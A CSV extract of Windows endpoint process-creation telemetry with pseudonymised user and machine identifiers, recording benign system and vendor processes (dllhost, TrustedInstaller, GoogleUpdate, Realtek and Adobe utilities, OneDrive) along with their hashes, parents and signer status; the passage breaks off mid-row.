+963,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:26.730614300+00:00,18376,dllhost.exe,DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:27.043210100+00:00,2021-06-23 00:52:50.789656+00:00,af38d7d5-806e-4b57-b80f-5c9ddc558c0f,computerpii_0a470890c60768167990033d701e7bd881398861,154636,False,10.7740.19041.1052,False,11540474045136908,,11540474045171798,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
+964,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:31.539019400+00:00,14596,msoia.exe,"""msoia.exe"" scan upload",PortableExecutable,2021-05-17 00:47:47.018542700+00:00,C:\Program Files\Microsoft Office\root\Office16\msoia.exe,5260200,1c5600cf684054412e3c22caf8992864,c86a878eb2113e7c3d470a42b0b829b3abfb1b7cbc50499e9d00709097470eaa,de354752cd9eb2705342b7e75d06d6a18e034add,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:31.572897700+00:00,2021-06-23 00:52:50.789904700+00:00,472f9983-b1b2-441a-b434-4a408251a774,computerpii_0a470890c60768167990033d701e7bd881398861,154643,False,10.7740.19041.1052,False,11540474045136925,,11540474045171800,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13801.20634,msoia,msoia.exe,Office Telemetry Dashboard Agent (OTD msoia)
+965,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:51:31.560731700+00:00,18568,TrustedInstaller.exe,TrustedInstaller.exe,PortableExecutable,2021-02-17 04:35:16.767474300+00:00,C:\Windows\servicing\TrustedInstaller.exe,156480,00c358b55509eaae79292d8e61fc317e,3759ab1b549f440d6769f9bddf38a5562b0ab938b93a1cd172befaf133963ede,642c216e51f8999629deba18dab857efa2b892ec,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:31.575746300+00:00,2021-06-23 00:52:50.789939600+00:00,11f42511-9ae9-46f1-959a-74504da00156,computerpii_0a470890c60768167990033d701e7bd881398861,154644,False,10.7740.19041.1052,False,11540474045136906,,11540474045171801,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.789,TrustedInstaller.exe,TrustedInstaller.exe,Windows Modules Installer
+966,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:51:31.590207+00:00,18728,TiWorker.exe,TiWorker.exe -Embedding,PortableExecutable,2021-06-09 01:15:48.791212900+00:00,C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1022_none_7e372e9e7c6ecccb\TiWorker.exe,239432,7d0c2a24dca67dde6d573e23871f5f0b,18a56c58b18030c70492189d7de2d1813e363b1fb6c59756b4e81e1071492a0e,2bc1a72ad7abb1b0008d961b8278f02289a41028,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:31.963891+00:00,2021-06-23 00:52:50.790011500+00:00,315344b5-65dc-47c3-9688-1e82589d2924,computerpii_0a470890c60768167990033d701e7bd881398861,154646,False,10.7740.19041.1052,False,11540474045136908,,11540474045171802,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1022,TiWorker.exe,TiWorker.exe,Windows Modules Installer Worker
+967,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:32.858128800+00:00,2216,SecurityHealthSystray.exe,"""SecurityHealthSystray.exe"" ",PortableExecutable,2019-12-07 09:08:41.566208100+00:00,C:\Windows\System32\SecurityHealthSystray.exe,86016,783c99afd4c2ae6950fa5694389d2cfa,570b37a7a3ffdafcceccc33cbc1968feb857b73ca3cb4dffedc2e67e9abd0878,d79d21f4d6741f83fb98fdcf8d06fe8c5d78a799,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:32.908960100+00:00,2021-06-23 00:52:50.790116+00:00,f8fc7d1f-65a5-4bff-a25c-aa1b0febbedc,computerpii_0a470890c60768167990033d701e7bd881398861,154649,False,10.7740.19041.1052,False,11540474045171770,,11540474045171804,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,SecurityHealthSystray,SecurityHealthSystray.exe,Windows Security notification icon
+968,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:51:33.073850500+00:00,16596,GoogleUpdate.exe,"""GoogleUpdate.exe"" /svc",PortableExecutable,2020-11-11 01:43:46.330605500+00:00,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,155592,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:33.299668400+00:00,2021-06-23 00:52:50.792496700+00:00,39b6f755-0f05-43d3-b370-241c66dba135,computerpii_0a470890c60768167990033d701e7bd881398861,154660,False,10.7740.19041.1052,False,11540474045136906,,11540474045171805,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer
+969,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:33.312728600+00:00,12256,RtkAudUService64.exe,"""RtkAudUService64.exe"" -background",PortableExecutable,2021-06-11 09:11:41.196395400+00:00,C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_f31d3fd59f245137\RtkAudUService64.exe,1256824,2805aa081ca8451e6d459d246c15bce9,9e659b1f529bed5111714ec4bb4cf3c055e69240438eee7b6e88226ba3146407,0efd918c6e662d4a43c13ef133eadd4ce0ae9061,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:33.600735200+00:00,2021-06-23 00:52:50.792679100+00:00,5d88ce91-015e-415f-9817-c54ca5d7dab5,computerpii_0a470890c60768167990033d701e7bd881398861,154665,False,10.7740.19041.1052,False,11540474045171770,,11540474045171806,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Realtek Semiconductor,Realtek HD Audio Universal Service,1.0.370.2,RtkAudUService.exe,RtkAudUService.exe,Realtek HD Audio Universal Service
+970,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:33.752559100+00:00,11996,WavesSvc64.exe,"""WavesSvc64.exe"" -Jack",PortableExecutable,2020-12-23 12:23:08+00:00,C:\Windows\System32\DriverStore\FileRepository\wavesapo9de.inf_amd64_177ab60f8bad72cc\WavesSvc64.exe,1776744,b91de64b9ff3cd6294fdb7b21972bc88,c1c36b61ad681091c2aa778d37b14afc52b9052698710c00fd8b1fecc73d0d30,bc540af17e33b3fbbd6573bbf6d0e5cd88b05b04,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:34.008074800+00:00,2021-06-23 00:52:50.793065200+00:00,70b7a789-4348-4742-a5de-4f807a20c282,computerpii_0a470890c60768167990033d701e7bd881398861,154676,False,10.7740.19041.1052,False,11540474045171770,,11540474045171807,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Waves Audio Ltd.,Waves MaxxAudio,1.42.18.0,WavesSvc.exe,WavesSvc.exe,Waves MaxxAudio Service Application
+971,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:35.590633+00:00,6528,AGCInvokerUtility.exe,"""AGCInvokerUtility.exe"" ",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe,3412680,f7c8ef9fd17e2c89dc2770cca8db6242,eb8faf481eeafb6be3c1254b81a800f2c74fa7d8ab682cab5409bef44251b60f,696a27e0a254ea3c0b14368bfc5d7b4997d20711,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:35.645816300+00:00,2021-06-23 00:52:50.793204700+00:00,1155f7f9-0cc4-4ab7-9a93-0d68a957d52c,computerpii_0a470890c60768167990033d701e7bd881398861,154681,False,10.7740.19041.1052,False,11540474045171770,,11540474045171808,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,"Adobe Systems, Incorporated",GC Invoker Utility,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AGCInvokerUtility.exe,AGCInvokerUtility.exe,Adobe GC Invoker Utility
+972,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:36.359311900+00:00,16320,updaterstartuputility.exe,"""updaterstartuputility.exe"" ",PortableExecutable,2018-04-10 16:54:48+00:00,C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\updaterstartuputility.exe,509936,35641379d8f16bf3d6024191261aa6ef,8566f0549fb35261dbda9f526ef86320bb3723c31de075af3882b21be15e1091,f37066e755372a85d9912e2c87258c3f3798f666,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:36.376211300+00:00,2021-06-23 00:52:50.793274500+00:00,45c0262b-9937-46e6-99eb-a670fd8495b0,computerpii_0a470890c60768167990033d701e7bd881398861,154683,False,10.7740.19041.1052,False,11540474045171770,,11540474045171809,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Adobe Systems Incorporated,Adobe Updater Startup Utility,9.0.0.31 (BuildVersion: 1.0; BuildDate: BUILDDATETIME),updaterstartuputility.exe,UpdateInstaller.exe,Adobe Updater Startup Utility
+973,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:36.709836900+00:00,6656,AdobeGCClient.exe,"""AdobeGCClient.exe"" --xmlFilePath=""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\adobegc_a02528"" --workflowInitiator=GCInvokerUtility --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a02528""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AdobeGCClient.exe,6743752,99b696fe03a14bd322f39fc35827e487,b57aab0a87e6c85ddf061a0a10bc10b96c61ae827fbb61f514a1df9fffcf263f,43d2475f42eeacb434b632975a33ebc8979a95b3,f7c8ef9fd17e2c89dc2770cca8db6242,eb8faf481eeafb6be3c1254b81a800f2c74fa7d8ab682cab5409bef44251b60f,696a27e0a254ea3c0b14368bfc5d7b4997d20711,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:35.590633+00:00,6528,AGCInvokerUtility.exe,"""AGCInvokerUtility.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:36.957313700+00:00,2021-06-23 00:52:50.793625200+00:00,95c0d101-2a10-4755-bc76-731d9e277a25,computerpii_0a470890c60768167990033d701e7bd881398861,154693,False,10.7740.19041.1052,False,11540474045171808,,11540474045171810,2021-06-23 00:51:35.590633+00:00,6528,2021-06-23 00:51:35.590633+00:00,AGCInvokerUtility.exe,6528,256,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3412680,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:51:35.594245800+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",GC Invoker Utility,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AGCInvokerUtility.exe,AGCInvokerUtility.exe,Adobe GC Invoker Utility,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClient,AdobeGCClient.exe,Adobe GC Client Application
+974,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:36.920317+00:00,10152,OneDrive.exe,"""OneDrive.exe"" /background",PortableExecutable,2020-11-11 